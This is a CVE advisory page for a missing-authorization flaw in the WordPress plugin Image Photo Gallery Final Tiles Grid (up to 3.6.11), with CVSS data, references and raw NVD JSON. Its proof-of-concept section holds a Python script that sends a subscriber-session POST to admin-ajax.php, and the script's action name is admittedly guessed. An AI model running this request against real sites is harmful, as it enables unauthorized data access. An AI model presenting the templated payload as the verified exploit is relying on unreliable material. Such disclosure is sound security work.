CVE-2026-27424

Description

Missing Authorization vulnerability in WP Chill Image Photo Gallery Final Tiles Grid allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Image Photo Gallery Final Tiles Grid: from n/a through 3.6.11.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Image Photo Gallery Final Tiles Grid <= 3.6.11

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the vulnerable WordPress site
target_url = "http://example.com/wp-admin/admin-ajax.php"

# Vulnerable payload parameters
payload = {
    "action": "final_tiles_gallery_ajax_action", # Replace with actual action name if known
    "gallery_id": "1"
}

# Cookies for a low-privileged user (e.g., Subscriber)
cookies = {
    "wordpress_logged_in_12345": "low_priv_user_session_token"
}

try:
    # Send POST request to exploit missing authorization
    response = requests.post(target_url, data=payload, cookies=cookies, timeout=10)

    if response.status_code == 200:
        print("[+] Request successful. Data leaked:")
        print(response.text)
    else:
        print("[-] Exploit failed or endpoint not found.")
except Exception as e:
    print(f"[!] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-27424
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-27424
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-27424/
[4] VulDB https://vuldb.com/cve/CVE-2026-27424
[5] https://patchstack.com/database/wordpress/plugin/final-tiles-grid-gallery-lite/vulnerability/wordpress-image-photo-gallery-final-tiles-grid-plugin-3-6-11-broken-access-control-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-27424", "sourceIdentifier": "[email protected]", "published": "2026-05-20T13:16:16.897", "lastModified": "2026-05-20T13:54:54.890", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WP Chill Image Photo Gallery Final Tiles Grid allows Exploiting Incorrectly Configured Access Control Security Levels.\n\nThis issue affects Image Photo Gallery Final Tiles Grid: from n/a through 3.6.11."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/final-tiles-grid-gallery-lite/vulnerability/wordpress-image-photo-gallery-final-tiles-grid-plugin-3-6-11-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}